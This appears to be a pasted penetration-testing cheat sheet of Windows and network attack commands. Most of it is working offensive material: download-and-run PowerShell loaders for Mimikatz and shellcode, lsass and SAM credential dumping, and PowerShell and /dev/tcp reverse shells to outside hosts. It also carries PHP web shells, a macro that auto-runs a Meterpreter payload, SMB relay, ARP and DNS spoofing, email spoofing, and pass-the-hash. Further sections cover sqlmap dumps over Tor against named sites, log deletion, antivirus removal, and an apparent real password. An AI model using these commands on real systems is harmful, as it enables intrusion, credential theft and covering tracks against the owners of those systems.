SHOW:
|
|
- or go back to the newest paste.
1 | powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | |
2 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks | |
3 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-UserHunter | |
4 | ||
5 | ||
6 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Get-NetLocalGroup | |
7 | ||
8 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-EnumerateLocalAdmin | |
9 | ||
10 | ||
11 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-StealthUserHunter | |
12 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-LocalAdminAccess | |
13 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1'); Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit | |
14 | ||
15 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Invoke-FileFinder | |
16 | ||
17 | ||
18 | powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1'); | |
19 | ||
20 | ||
21 | BloodHound: | |
22 | powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/PowerShell/BloodHound.ps1');Invoke-Bloodhound -CSVFolder C:\Temp | |
23 | ||
24 | ||
25 | --- | |
26 | powershell_shell: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\temp | |
27 | ||
28 | meterpreter > download c:\\Windows\\Temp\\lsass_632.dmp | |
29 | ||
30 | python -m SimpleHTTPServer 9000 | |
31 | ||
32 | sekurlsa::Minidump lsassdump.dmp | |
33 | sekurlsa::logonPasswords | |
34 | ||
35 | recon and finding other networks: | |
36 | fping 192.168.0.0/16 | grep -a "alive" | |
37 | ||
38 | ||
39 | ||
40 | --- | |
41 | ||
42 | ||
43 | powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1'); | |
44 | ||
45 | powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.45:8080/') | |
46 | ||
47 | ||
48 | reg.exe save hklm\sam c:\temp\sam.save | |
49 | ||
50 | reg.exe save hklm\security c:\temp\security.save | |
51 | ||
52 | reg.exe save hklm\system c:\temp\system.save | |
53 | ||
54 | ||
55 | root@kali:~# nmap 190.57.29.177 -v -Pn -sT -A -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html" | |
56 | ||
57 | ||
58 | ||
59 | ||
60 | ||
61 | BDFproxy: | |
62 | veil option - #50 | |
63 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
64 | ./bdf_proxy.py | |
65 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 | |
66 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080 | |
67 | msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.75; set LPORT 4444; set exitonsession false; exploit -j" | |
68 | arpspoof -i eth0 -t target.ip router.ip | |
69 | arpspoof -i eth0 -t router.ip target.ip | |
70 | msfconsole -r bdfproxy_msf_resource.rc | |
71 | ||
72 | ||
73 | nmap -A -oG - 190.57.29.0/24 -p 445 --osscan-guess | grep -a "Windows Server" | |
74 | ||
75 | ||
76 | ||
77 | ||
78 | IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1"); Invoke-Inveigh -ConsoleOutput Y -NBNS Y -ConsoleStatus 1 | |
79 | ||
80 | procdump -ma lsass.exe lsass.dmp | |
81 | ||
82 | powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’); Get-NetUser -AdminCount | Select name,whencreated,pwdlastset,lastlogon | |
83 | ||
84 | ||
85 | *** | |
86 | sudo msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set LPORT 443; set exitonsession false; exploit -j" | |
87 | ||
88 | ||
89 | powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 443" | |
90 | ||
91 | ||
92 | rubber ducky: | |
93 | ||
94 | java -jar duckencode.jar -i "reverse shell.txt" | |
95 | ||
96 | ||
97 | ||
98 | smbrelay: | |
99 | ||
100 | msfconsole -x "use exploit/multi/script/web_delivery; set target 2; set URIPATH /; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.22.62; set exitonsession false; exploit -j" | |
101 | ||
102 | ./responder.py -I eth0 | |
103 | ||
104 | ./smbrelayx.py -h 192.168.22.151 -c "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.168.22.119:8080/')" | |
105 | ||
106 | "powershell -nop -exec bypass -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" | |
107 | ||
108 | pth-winexe -U gp-wks-conf2/Administrator%aad3b435b51404eeaad3b435b51404ee:6154da6030a803632a63b1a0e1a3aeb3 //192.168.22.46 cmd | |
109 | ||
110 | ||
111 | nbtscan -r 192.168.22.0/24 | |
112 | fping -g -d 192.168.23.0/24 2>/dev/null | grep alive | |
113 | ||
114 | capture ntlm handshake (snarf + responder) | |
115 | crack password from handshake (john) | |
116 | password spray to find local admin (metasploit) | |
117 | establish shells with local admin boxes (metasploit) | |
118 | ||
119 | ||
120 | snarf + responder: | |
121 | nodejs snarf.js 192.168.22.62 -d 192.168.22.41 | |
122 | john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt | |
123 | responder -I eth0 | |
124 | ||
125 | find local admin (post exploit): | |
126 | use auxiliary/scanner/smb/smb_login | |
127 | set smbdomain <domain> | |
128 | set smbuser <username> | |
129 | set smbpass <password> | |
130 | set rhosts 0.0.0.0/24 | |
131 | ||
132 | Shell: | |
133 | msfconsole: use exploit/windows/smb/psexec | |
134 | msfconsole: set payload windows/meterpreter/reverse_https | |
135 | run post/windows/gather/smart_hashdump | |
136 | ||
137 | dumping creds/hashes: | |
138 | run post/windows/gather/cachedump | |
139 | run post/windows/gather/smart_hashdump | |
140 | load mimikatz > wdigest | |
141 | ||
142 | cracking hashes: | |
143 | john --format=mscash2 --wordlist=/media/sf_Shared/wordlists/rockyou.txt --rules=all gp_hashes.txt | |
144 | john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt | |
145 | ||
146 | ||
147 | password spraying: | |
148 | http://www.blackhillsinfosec.com/?p=4989 | |
149 | @FOR /F %s in (systems.txt) DO @net use \\%s\C$ /.\Administrator | |
150 | AdminPass 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use | |
151 | /delete \\%s\C$ > NUL | |
152 | ||
153 | rpcclient: | |
154 | http://carnal0wnage.attackresearch.com/2010/06/more-with-rpcclient.html | |
155 | find local DC first, then -> | |
156 | rpcclient -U "" -N <ip addr of DC> | |
157 | commands: ? | |
158 | ||
159 | xfreerdp /u:jwelkley /p:GoBears1 /d:gp /v:192.168.2.60 /sec:rdp | |
160 | ||
161 | metasploit basics: | |
162 | gain access | |
163 | getuid | |
164 | getpid | |
165 | sysinfo | |
166 | run PS | |
167 | migrate process | |
168 | ||
169 | ||
170 | ||
171 | Reverse Meterpreter Shell: | |
172 | ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run" | |
173 | powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost aws.shellgam3.com -Lport 8443" | |
174 | ||
175 | ||
176 | ||
177 | Dump wireless PSKs: | |
178 | (netsh wlan show profiles) | Select-String “\:(.+)$” | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=”$name” key=clear)} | Select-String “Key Content\W+\:(.+)$” | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | |
179 | ||
180 | DNS subdomain enumeration: | |
181 | dnsrecon -d wabt.com -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123 | |
182 | ||
183 | ||
184 | ||
185 | ||
186 | ./proxychains4 nmap -p 53 -v -Pn -sS 8.8.8.8 -e eth0 | |
187 | ||
188 | ||
189 | ||
190 | snarf + responder: | |
191 | nodejs snarf.js 192.168.22.62 -d 192.168.22.41 | |
192 | john snarf.pot --rules=all --wordlist=/media/sf_Shared/wordlists/guidant.txt | |
193 | responder -I eth0 | |
194 | ||
195 | MiTM: | |
196 | netstat -nr | |
197 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
198 | arpspoof -i eth0 -t target.ip router.ip | |
199 | arpspoof -i eth0 -t router.ip target.ip | |
200 | ||
201 | MiTM via mitmf: | |
202 | mitmf -i eth0 --arp --spoof --hsts --gateway=10.0.0.1 --target=192.168.0.1 | |
203 | ||
204 | Beef: | |
205 | ./beef | |
206 | mitmf -i eth0 --arp --spoof --hsts --gateway=192.168.0.1 --target=192.168.0.2 --inject --js-url http://192.168.0.5:300/hook.js | |
207 | ||
208 | DNS subdomain brute forcing: | |
209 | dnsrecon -d wpcu.coop -D /media/sf_Shared/wordlists/SecLists/Discovery/DNS/deepmagic.com_top50kprefixes.txt -t brt -f -n 8.8.8.8 --iw | grep -v 123.123.123.123 | |
210 | ||
211 | ||
212 | ||
213 | Certificate injection: | |
214 | mitm + | |
215 | mitmproxy -T --host | |
216 | ||
217 | PtH with Metasploit: | |
218 | Kali: 173.18.131.94 | |
219 | Victim: 173.18.131.111 | |
220 | ||
221 | root@kali:/usr/bin# ./msfconsole | |
222 | msf > use exploit/windows/smb/psexec | |
223 | msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp | |
224 | payload => windows/meterpreter/reverse_tcp | |
225 | msf exploit(psexec) > set lhost 173.18.131.94 | |
226 | lhost => 173.18.131.94 | |
227 | msf exploit(psexec) > set rhost 173.18.131.111 | |
228 | rhost => 173.18.131.111 | |
229 | msf exploit(psexec) > set smbpass 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4 | |
230 | smbpass => 00000000000000000000000000000000:b048b97d9fdb66d3d2ed72b3782847a4 | |
231 | msf exploit(psexec) > set smbuser administrator | |
232 | smbuser => administrator | |
233 | msf exploit(psexec) > set smbdomain test | |
234 | smbdomain => test | |
235 | msf exploit(psexec) > exploit | |
236 | ||
237 | ||
238 | smb relay attack: | |
239 | Metasploit box: 172.17.130.81 | |
240 | Domain Admin Workstation: 172.17.130.33 | |
241 | Target Server: 172.17.130.75 | |
242 | msfconsole -x “use windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81;set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run” | |
243 | -embed in email message: | |
244 | <html> | |
245 | <head> | |
246 | <img src=”\\172.17.130.81\test.jpg”></img> | |
247 | </head> | |
248 | </html> | |
249 | ||
250 | spoofing email via telnet: | |
251 | root@kali:~# telnet mx1.mail.icloud.com 25 | |
252 | Trying 17.158.8.67… | |
253 | Connected to mx1.mail.icloud.com. | |
254 | Escape character is ‘^]’. | |
255 | 220 nk11p00mm-smtpin001.mac.com — Server ESMTP (Oracle Communications Messaging Server 7.0.5.36.0 64bit (built Sep 8 2015)) | |
256 | helo whatever.com | |
257 | 250 nk11p00mm-smtpin001.mac.com OK, 50-197-245-29-static.hfc.comcastbusiness.net [XX.197.XXX.29]. | |
258 | mail from:bob@icloud.com | |
259 | 250 2.5.0 Address Ok. | |
260 | rcpt to:nickvangilder@icloud.com | |
261 | 250 2.1.5 nickvangilder@icloud.com OK. | |
262 | data | |
263 | 354 Enter mail, end with a single “.”. | |
264 | To:Nick VanGilder<nickvangilder@icloud.com> | |
265 | From:Bob Dole<bob@icloud.com> | |
266 | Reply-To:Bob Dole<nickvangilder@outlook.com> | |
267 | Subject:Test | |
268 | ||
269 | This is a test | |
270 | . | |
271 | 250 2.5.0 Ok. | |
272 | ||
273 | check public ip address: | |
274 | proxychains curl ipecho.net/plain | |
275 | ||
276 | powershell | |
277 | import-module activedirectory | |
278 | get-aduser -filter {PasswordNeverExpires -eq $True -AND Enabled -eq $True} -properties PasswordLastSet | Sort PasswordLastSet | Select Distinguishedname,PasswordLastSet | |
279 | ||
280 | ||
281 | on linux box: nc -lvp 8443 | |
282 | powershell -> | |
283 | $client = New-Object System.Net.Sockets.TCPClient("aws.shellgam3.com",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | |
284 | ||
285 | powershell -nop -exec bypass -file payload.ps1 | |
286 | ||
287 | ||
288 | one-liner: | |
289 | powershell -Command "& {$client = New-Object System.Net.Sockets.TCPClient('192.168.22.63',8443);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}" | |
290 | ||
291 | To enumerate all domain controllers: | |
292 | nltest /dclist:domain.local | |
293 | ||
294 | Enumerate local admins: | |
295 | net localgroup Administrators | |
296 | ||
297 | ||
298 | Get-ADDefaultDomainPasswordPolicy | |
299 | net group "domain admins" /domain | |
300 | ||
301 | Fetch a file via HTTP (wget in PowerShell): PS C:\> (New-Object System.Net.WebClient).DownloadFile("http ://10.10.10.10/nc.exe","nc.exe") | |
302 | ||
303 | wmic computersystem get model,name,manufacturer,systemtype | |
304 | ||
305 | ||
306 | File injection: | |
307 | MiTM + | |
308 | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 | |
309 | ./mitmproxy -T -s “iframe_injector.py http://www.website.com/files/malicious_file.xlsm; | |
310 | ||
311 | ||
312 | cmdkey.exe /add:MACHINE_NAME_HERE /user:MACHINE_NAME_HERE\Administrator /pass:PASSWORD_HERE | |
313 | cmdkey.exe /delete:MACHINE_NAME_HERE | |
314 | ||
315 | https://download.sysinternals.com/files/PSTools.zip | |
316 | copy file to target | |
317 | psexec \\target -u username -p password cmd.exe | |
318 | start c:\path\payload.vbs | |
319 | ||
320 | ||
321 | Enable RDP: | |
322 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
323 | ||
324 | Disable RDP: | |
325 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f | |
326 | ||
327 | web app recon and scanning: | |
328 | ||
329 | proxychains, proxychains4, torify, tor-resolve | |
330 | service tor start | |
331 | service tor status | |
332 | dont forget to modify /etc/resolv.conf = 127.0.0.1 | |
333 | protect against accidental discolsure = sudo iptables -A OUTPUT --dest <target> -j DROP | |
334 | ||
335 | ||
336 | proxychains nmap -v -sN -n 207.223.121.128 -PN | |
337 | ||
338 | nmap ip.adddress -v -Pn -sT | |
339 | nmap -Sv -T4 hostname.com | |
340 | dirb https://www.example.com | |
341 | grabber --url www.site.com --spider 1 --sql | |
342 | uniscan -d -u test.com | |
343 | /usr/share/zaproxy# java -DsocksProxyHost=127.0.0.1 -DsocksProxyPort=9050 -jar zap-2.4.1.jar | |
344 | nikto -h http://www.site.com | |
345 | whatweb test.com | |
346 | w3af_console | |
347 | wpscan | |
348 | ||
349 | sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --risk=3 --level=5 --threads=10 --dbs --dump -D Database_name -T table_name -u http://xxxxx.com/board/board.php?id=6 | |
350 | sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --threads=10 --crawl=2 --risk=3 --level=5 --dump -u http://host.com/board.php?id=6 | |
351 | sqlmap --tor --tor-type=SOCKS5 --check-tor --random-agent --dbs --dump -u https://test.com --sql-shell | |
352 | sqlmap --tor --tor-type=socks5 --check-tor --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=4 --batch -f --dbs -u https://review.logicforce.com | |
353 | sqlmap --random-agent --keep-alive --level=5 --forms --crawl=2 --risk=3 --threads=10 --batch -f --dump --dbs -u https://xxxxxxx.com | |
354 | ||
355 | sqlmap --random-agent --keep-alive --forms --crawl=2 --risk=3 --threads=10 --level=5 --batch -f --dbs -u http://human.firstcommunitymortgage.com/fha-loans/?gcf_captcha | |
356 | ||
357 | ||
358 | Look for HTTP PUT: | |
359 | curl -X OPTIONS -v http://200.x.x.x/test/ | |
360 | ||
361 | UPLOAD FILE: | |
362 | curl --upload-file /root/Desktop/reverse_shell.php -v --url http://172.17.130.93/test/rshell.php -0 --http1.0 | |
363 | curl -i -X PUT -H "Content-Type: application/xml; charset=utf-8" -d @"/tmp/some-file.xml" http://www.victim.com/newpage | |
364 | curl -X PUT -d "text or data to put" http://www.victim.com/destination_page | |
365 | curl -i -H "Accept: application/json" -X PUT -d "text or data to put" http://victim.com/new_page | |
366 | ||
367 | first put this into cmd.php: | |
368 | <?php echo system($_GET["cmd"]); ?> | |
369 | ||
370 | THEN, for shell access: | |
371 | ||
372 | this one worked: | |
373 | put this in filename.sh | |
374 | ||
375 | http://172.17.130.93/test/cmd.php?cmd=filename.sh | |
376 | $ exec 5<>/dev/tcp/evil.com/8080 | |
377 | $ cat <&5 | while read line; do $line 2>&5 >&5; done | |
378 | ||
379 | Macro enabled xlsm: | |
380 | ubuntu@ip-172-31-18-189:/opt/metasploit-framework$ ./msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_https; set LHOST 172.31.18.189; set PORT 8443; run" | |
381 | ||
382 | Private Sub Auto_Open() | |
383 | strCommand = "powershell -nop -windowstyle hidden -NonInteractive -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1 ');invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost 52.x.x.123 -Lport 8443" | |
384 | Set WshShell = CreateObject("WScript.Shell") | |
385 | Set WshShellExec = WshShell.Exec(strCommand) | |
386 | End Sub | |
387 | ||
388 | DNS Spoofing: | |
389 | #IP Forwarding | |
390 | echo 1 > /proc/sys/net/ipv4/ip_forward | |
391 | ||
392 | #DNS Port Redirection | |
393 | iptables -A INPUT -i eth0 -p udp --dport 53 -j ACCEPT | |
394 | iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53 | |
395 | ||
396 | #ARP Cache Poisioning / MitM | |
397 | arpspoof -i eth0 -t victimIP routerIP | |
398 | arpspoof -i eth0 -t routerIP victimIP | |
399 | ||
400 | #DNS Spoofing | |
401 | dnschef -i 172.17.130.60 --fakeip=52.37.49.217 --fakedomains=test.com | |
402 | #172.17.130.60 = my internal Kali box | |
403 | #Fake IP = where you want to redirect to | |
404 | #Fake Domains = name of domain to redirect | |
405 | ||
406 | ||
407 | View your current user: whoami | |
408 | View information about the current user: net user myuser(for a local user) | |
409 | net user myuser /domain (for a domain user) | |
410 | View the local groups: net localgroup | |
411 | View the local administrators: net localgroup Administrators | |
412 | Add a new user: net user myuser mypass /add | |
413 | Add a user in the local Administrators group: net localgroup Administrators myuser /add | |
414 | View the domain name of current machine: net config workstation | |
415 | net config server | |
416 | View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName | |
417 | View the list of domain admins: net group "Domain Admins" /domain | |
418 | View the list of started services (search for antivirus): net start | |
419 | sc query | |
420 | Stop a service: net stop "Symantec Endpoint Protection" | |
421 | View the list of started processes and the owner: tasklist /v | |
422 | Kill a process by its name taskkill /F /IM "cmd.exe" | |
423 | Abort a shutdown/restart countdown shutdown /a | |
424 | Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php | |
425 | View established connections of current machine: netstat -a -n -p tcp | find "ESTAB" | |
426 | View open ports of current machine: netstat -a -n -p tcp | find "LISTEN" | |
427 | netstat -a -n -p udp | |
428 | View network configuration: netsh interface ip show addresses | |
429 | netsh interface ip show route | |
430 | netsh interface ip show neighbors | |
431 | View current network shares: net share | |
432 | Mount a remote share with the rights of the current user: net use K: \\10.1.2.3\C$ | |
433 | dir K: | |
434 | Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
435 | ||
436 | Blind Files | |
437 | %SYSTEMDRIVE%\boot.ini | |
438 | A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. | |
439 | %WINDIR%\win.ini | |
440 | ||
441 | This is another file to look for if boot.ini isn’t there or coming back, which is some times the case. | |
442 | %SYSTEMROOT%\repair\SAM | |
443 | %SYSTEMROOT%\System32\config\RegBack\SAM | |
444 | It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in \repair is locked, but can be retired using forensic or Volume Shadow copy methods | |
445 | %SYSTEMROOT%\repair\system | |
446 | %SYSTEMROOT%\System32\config\RegBack\system | |
447 | ||
448 | System | |
449 | whoami /all | |
450 | set | |
451 | fsutil fsinfo drives | |
452 | reg query HKLM /s /d /f "C:\* *.exe" | find /I "C:\" | find /V """" | |
453 | ||
454 | ipconfig /all | |
455 | ipconfig /displaydns | |
456 | netstat -nabo | |
457 | netstat -s -p [tcp|udp|icpm|ip] | |
458 | netstat -r | |
459 | netstat -na | findstr :445 | |
460 | netstat -nao | findstr LISTENING | |
461 | netstat -nao | findstr LISTENING | |
462 | netstat -na | findstr LISTENING | |
463 | netsh diag show all | |
464 | ||
465 | net view | |
466 | net view /domain | |
467 | net view /domain:otherdomain | |
468 | net user %USERNAME% /domain | |
469 | net user /domain | |
470 | net accounts | |
471 | net accounts /domain | |
472 | net localgroup administrators | |
473 | net localgroup administrators /domain | |
474 | net group “Domain Admins” /domain | |
475 | net group “Enterprise Admins” /domain | |
476 | net group “Domain Controllers” /domain | |
477 | nbtstat -a [ip here] | |
478 | net share | |
479 | net session | find / “\\” | |
480 | arp -a | |
481 | route print | |
482 | browstat (Not working on XP) | |
483 | netsh wlan show profiles | |
484 | shows all saved wireless profiles. You may then export the info for those profiles with the command below | |
485 | netsh wlan export profile folder=. key=clear | |
486 | netsh wlan [start|stop] hostednetwork | |
487 | netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent|temporary | |
488 | netsh wlan set hostednetwork mode=[allow|disallow] | |
489 | wmic ntdomain list Retrieve information about Domain and Domain Controller | |
490 | ||
491 | ||
492 | gpresult /z | |
493 | sc qc | |
494 | sc query | |
495 | sc queryex | |
496 | type %WINDIR%\System32\drivers\etc\hosts | |
497 | echo %COMSPEC% | |
498 | c:\windows\system32\gathernetworkinfo.vbs | |
499 | tree C:\ /f /a > C:\output_of_tree.txt | |
500 | dir /a | |
501 | dir /b /s [Directory or Filename] | |
502 | dir \ /s /b | find /I “searchstring” | |
503 | ||
504 | %WINDIR%\system32\config\AppEvent.Evt | |
505 | %WINDIR%\system32\config\SecEvent.Evt | |
506 | %WINDIR%\system32\config\default.sav | |
507 | %WINDIR%\system32\config\security.sav | |
508 | %WINDIR%\system32\config\software.sav | |
509 | %WINDIR%\system32\config\system.sav | |
510 | %WINDIR%\system32\CCM\logs\*.log | |
511 | %USERPROFILE%\ntuser.dat | |
512 | %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat | |
513 | %WINDIR%\System32\drivers\etc\hosts | |
514 | unattend.txt, unattend.xml, sysprep.inf | |
515 | ||
516 | net share \\computername | |
517 | tasklist /V /S computername | |
518 | qwinsta /SERVER:computername | |
519 | qprocess /SERVER:computername * | |
520 | net use \\computername | |
521 | net use \\computername /user:DOMAIN\username password | |
522 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f | |
523 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f | |
524 | net time \\computername (Shows the time of target computer) | |
525 | dir \\computername\share_or_admin_share\ (dir list a remote directory) | |
526 | tasklist /V /S computername | |
527 | Lists tasks w/users running those tasks on a remote system. This will remove any IPC$ connection after it is done so if you are using another user, you need to re-initiate the IPC$ mount | |
528 | ||
529 | WMI | |
530 | wmic bios | |
531 | wmic qfe qfe get hotfixid | |
532 | wmic startupwmic service | |
533 | wmic process get caption,executablepath,commandline | |
534 | wmic process call create “process_name” (executes a program) | |
535 | wmic process where name=”process_name” call terminate (terminates program) | |
536 | wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber (hard drive information) | |
537 | wmic useraccount (usernames, sid, and various security related goodies) | |
538 | wmic useraccount get /ALL | |
539 | wmic share get /ALL (you can use ? for gets help ! ) | |
540 | wmic startup list full (this can be a huge list!!!) | |
541 | wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about target) | |
542 | ||
543 | reg save HKLM\Security security.hive (Save security hive to a file) | |
544 | reg save HKLM\System system.hive (Save system hive to a file) | |
545 | reg save HKLM\SAM sam.hive (Save sam to a file)= | |
546 | reg add [\\TargetIPaddr\] [RegDomain][ \Key ] | |
547 | reg export [RegDomain]\[Key] [FileName] | |
548 | reg import [FileName ] | |
549 | reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values ) | |
550 | ||
551 | Deleting Logs | |
552 | wevtutil el (list logs) | |
553 | wevtutil cl <LogName> (Clear specific lowbadming) | |
554 | del %WINDIR%\*.log /a /s /q /f | |
555 | ||
556 | Uninstalling Software “AntiVirus” (Non interactive) | |
557 | wmic product get name /value (this gets software names) | |
558 | wmic product where name="XXX" call uninstall /nointeractive (this uninstalls software) | |
559 | ||
560 | ||
561 | # Other (to be sorted) | |
562 | ||
563 | pkgmgr usefull /iu :”Package” | |
564 | pkgmgr usefull /iu :”TelnetServer” (Install Telnet Service ...) | |
565 | pkgmgr /iu:”TelnetClient” (Client ) | |
566 | rundll32.exe user32.dll, LockWorkStation (locks the screen -invasive-) | |
567 | wscript.exe <script js/vbs> | |
568 | cscript.exe <script js/vbs/c#> | |
569 | ||
570 | ||
571 | Vista/7 | |
572 | ||
573 | winstat features | |
574 | wbadmin get status | |
575 | wbadmin get items | |
576 | gpresult /H gpols.htm | |
577 | bcdedit /export <filename> | |
578 | ||
579 | #Disables the local windows firewall | |
580 | netsh firewall set opmode disable | |
581 | ||
582 | #Enables the local windows firewall. If rules are not in place for your connection, this could cause you to loose it. | |
583 | netsh firewall set opmode enable | |
584 | ||
585 | @FOR /F %n in (users.txt) DO @FOR /F %p in (password.txt) DO @net use \\192.168.200.1 /user:domain\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\192.168.200.1\IPC$ > NUL |